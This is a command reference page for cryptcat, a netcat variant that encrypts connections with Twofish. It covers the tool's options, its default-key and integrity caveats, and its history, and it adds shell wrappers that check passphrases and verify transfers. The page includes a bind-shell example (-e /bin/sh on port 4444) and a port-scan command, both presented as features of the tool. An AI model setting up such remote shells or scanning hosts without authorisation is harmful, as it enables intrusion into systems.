LinuxCommandLibrary

cryptcat

Encrypt data over network connections

TLDR

[l]isten on a specified [p]ort and print any data received

$ cryptcat -k [password] -l -p [port]

Connect to a specified host and port
$ cryptcat -k [password] [ip_address] [port]

Specify the timeout ([w]) in seconds for the connect and for final network reads
$ cryptcat -k [password] -w [timeout_in_seconds] [ip_address] [port]

Scan ([z]) the open ports of a specified host
$ cryptcat -v -z [ip_address] [port]

Act as a one-way proxy: forward data received on a local TCP port to the given remote host (replies from the remote side are not relayed back; a bidirectional relay needs a named pipe)
$ cryptcat -k [password] -l -p [local_port] | cryptcat -k [password] [hostname] [remote_port]

SYNOPSIS

cryptcat [options] [host] [port]

PARAMETERS

-k
    Pre-shared passphrase used to key the Twofish cipher; both ends must use the same value. If omitted, cryptcat silently uses its compiled-in default key ('metallica'), so always set it

-l
    Listen mode for incoming connections

-p
    Local port number

-e
    Execute the given program after connect/bind, with its stdin/stdout attached to the connection (dangerous: exposes the program to whoever connects)

-u
    Use UDP protocol instead of TCP

-v
    Verbose output (use -vv for more)

-n
    Numeric IP addresses only (no DNS)

-z
    Zero-I/O mode for port scanning

-w
    Timeout in seconds for connects and for final network reads (also lets the client exit once stdin is exhausted and the connection goes idle)

-s
    Local source address

-o
    Hex dump traffic to file

-r
    Randomize local/remote ports

-i
    Delay interval in seconds between lines sent and between ports scanned

-h
    Display help summary

-C
    Send CRLF as line ending

DESCRIPTION

Cryptcat is the classic netcat (nc) utility extended with Twofish encryption of the connection payload. It provides TCP or UDP connections, file transfers, remote shells, port forwarding and port scanning over untrusted networks, with all application data encrypted in both directions under a key derived from the passphrase given with -k. Both endpoints must use the same passphrase and compatible cryptcat builds; the scheme is purely symmetric and performs no key exchange.

The options mirror netcat: listen for connections, bind a local port, execute a program after connect, UDP mode, verbose logging, timeouts, and zero-I/O scanning. Unlike plain netcat it gives confidentiality without wrapping the connection in stunnel or SSH, but confidentiality is all it gives: there is no peer authentication beyond possession of the shared passphrase, no integrity check on the stream, and no forward secrecy.

Typical use: Server side (listener exposes a shell): cryptcat -l -p 4444 -k 'secretkey' -e /bin/sh
Client side: cryptcat -k 'secretkey' [server_host] 4444
Commands typed on the client run in the encrypted shell on the listener. Useful for penetration testing, quick ad-hoc tunnels, or legacy systems; for anything production-grade, SSH is preferred.

CAVEATS

The passphrase must match exactly on both ends, and a weak one can be guessed by brute force against captured traffic. If -k is omitted, cryptcat falls back to its compiled-in default key ('metallica'), which provides no protection at all. There is no peer authentication, no integrity protection (no MAC) and no replay protection: Twofish is a block cipher and cryptcat applies it for confidentiality only, so an on-path attacker can modify or replay ciphertext undetected; verify transferred data out of band (for example by comparing sha256sum output). There is no key exchange, so anyone who later learns the passphrase can decrypt recorded sessions. The passphrase is passed on the command line and is visible in process listings (ps) and shell history on both hosts. Twofish is not a FIPS-approved algorithm. Packaged as cryptcat in Debian, Ubuntu and Kali; elsewhere, build from source.

ENCRYPTION NOTES

Symmetric Twofish encryption keyed from the -k passphrase (default 'metallica'). There is no key-exchange handshake: encryption starts with the first byte of the connection, and the mode of operation and IV handling are fixed by the implementation rather than negotiated, so both ends must run compatible cryptcat builds. No authentication tag is added to the stream.

EXAMPLE: SECURE FILE TRANSFER

Server: cryptcat -l -p 12345 -k 'pass' > file.txt
Client: cryptcat -w 3 -k 'pass' server 12345 < localfile.txt
The -w 3 makes the client exit a few seconds after the file is exhausted and the connection goes idle; without it the connection stays open until the listener closes it. Because cryptcat adds no integrity check, compare sha256sum output for localfile.txt and file.txt afterwards.
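The proxy command in the TLDR and the file transfer above leave two things to the operator: the pipe-based proxy only carries data one way, and nothing detects a tampered or truncated transfer. The POSIX shell functions below are an added example written for this page, not code from the cryptcat project: they refuse the empty or default passphrase, compute a sha256sum digest to be checked out of band, add -w so the sender exits, and build a bidirectional relay with a named pipe. The function names and the 16-character minimum passphrase length are this example's own assumptions; cryptcat, sha256sum and mkfifo are assumed to be on PATH.

```shell
#!/bin/sh
# Added example (not from the cryptcat project). Wrappers around cryptcat that
# guard against the default-key pitfall, verify transfers with sha256sum
# (cryptcat has no integrity protection of its own), and relay both directions.

# Reject passphrases that give no real protection: empty, or the compiled-in
# default "metallica" that cryptcat silently uses when -k is omitted.
# The 16-character minimum is a policy chosen for this example.
check_passphrase() {
    case "$1" in
        ''|metallica) return 1 ;;
    esac
    [ "${#1}" -ge 16 ]
}

# Hex SHA-256 digest of a file, or an empty string if it cannot be read.
file_digest() {
    sha256sum "$1" 2>/dev/null | cut -d' ' -f1
}

# Returns 0 if both files hash identically, 1 otherwise (including a missing file).
verify_transfer() {
    a=$(file_digest "$1"); b=$(file_digest "$2")
    [ -n "$a" ] && [ "$a" = "$b" ]
}

# Receiver: cryptcat_recv PORT PASSPHRASE OUTFILE EXPECTED_SHA256
# The expected digest must arrive out of band (ssh, a call, a ticket); an
# on-path attacker who flips ciphertext bits would otherwise go unnoticed.
cryptcat_recv() {
    port=$1 pass=$2 out=$3 expected=$4
    check_passphrase "$pass" || { echo "refusing weak or default passphrase" >&2; return 2; }
    cryptcat -k "$pass" -l -p "$port" > "$out" || return 1
    [ "$(file_digest "$out")" = "$expected" ] ||
        { echo "digest mismatch: $out is corrupted or was tampered with" >&2; return 1; }
}

# Sender: cryptcat_send HOST PORT PASSPHRASE INFILE
# -w 3 makes cryptcat exit 3 s after the connection goes idle once stdin hits
# EOF; without it the client waits for the listener to close.
cryptcat_send() {
    host=$1 port=$2 pass=$3 in=$4
    check_passphrase "$pass" || { echo "refusing weak or default passphrase" >&2; return 2; }
    echo "sha256 to hand to the receiver out of band: $(file_digest "$in")" >&2
    cryptcat -k "$pass" -w 3 "$host" "$port" < "$in"
}

# Bidirectional relay: cryptcat_relay LOCAL_PORT HOST REMOTE_PORT PASSPHRASE
# A plain pipe only carries data from the listener to the remote side. Feeding
# the remote side's output back through a FIFO returns replies to the client.
cryptcat_relay() {
    lport=$1 host=$2 rport=$3 pass=$4
    check_passphrase "$pass" || { echo "refusing weak or default passphrase" >&2; return 2; }
    fifo=$(mktemp -u) && mkfifo -m 600 "$fifo" || return 1
    trap 'rm -f "$fifo"' EXIT INT TERM
    cryptcat -k "$pass" -l -p "$lport" < "$fifo" | cryptcat -k "$pass" "$host" "$rport" > "$fifo"
}
```

The relay's FIFO is created mode 600 with mktemp -u so that no other local user can open it and inject data into the tunnel; the trap removes it when the relay ends.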

HISTORY

Released around 2000 by farm9.com as an extension of Hobbit's original netcat (1995) with Twofish (Schneier et al., 1998 AES finalist) added. Shipped in infosec distributions such as BackTrack and Kali, but development stopped in the early 2000s as SSH became ubiquitous; the Debian package is still built from a 2003 snapshot (version 20031202).

SEE ALSO

nc(1), ncat(1), socat(1), netcat(1), ssh(1)
